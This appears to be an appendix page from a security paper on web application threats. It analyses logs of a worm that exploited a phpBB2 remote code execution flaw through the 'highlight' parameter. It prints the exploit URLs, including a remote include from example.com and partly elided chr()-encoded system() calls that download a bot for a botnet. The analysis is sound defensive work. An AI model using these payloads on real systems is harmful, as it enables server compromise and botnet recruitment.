HomeKnow your Enemy: Web Application ThreatsAppendix A - Examples

The PHPBB Worm

Thu, 08/07/2008 - 14:19 — drupal

This section exhibits example logs created by a worm exploiting a remote code execution vulnerability within phpBB2. The exploit was sent in the value of the "highlight" parameter of the application's viewtopic.php script. Accessing the following URL downloaded the file root.txt from the domain example.com /phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://example.com/root.txt?&

The worm checks if the PHPBB installation is vulnerable by fetching the following URL, by attempting to print "jSVowMsd" in the output. If it finds "jSVowMsd" in the requested page, that is, if the vulnerability is present in the application, the targeted PHP server will then run the next two commands.

/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114) ... chr(34))%252E%2527

The following downloads software from example.com/chobits/linuxday.txt

/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103) ... chr(56))%252E%2527

Finally, a bot is downloaded and executed in an attempt to join a botnet:

/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103)%252Echr(101) ... chr(110)%252Echr(99)%252Echr(97))%252E%2527
‹ The Lupper WormupMambo exploit ›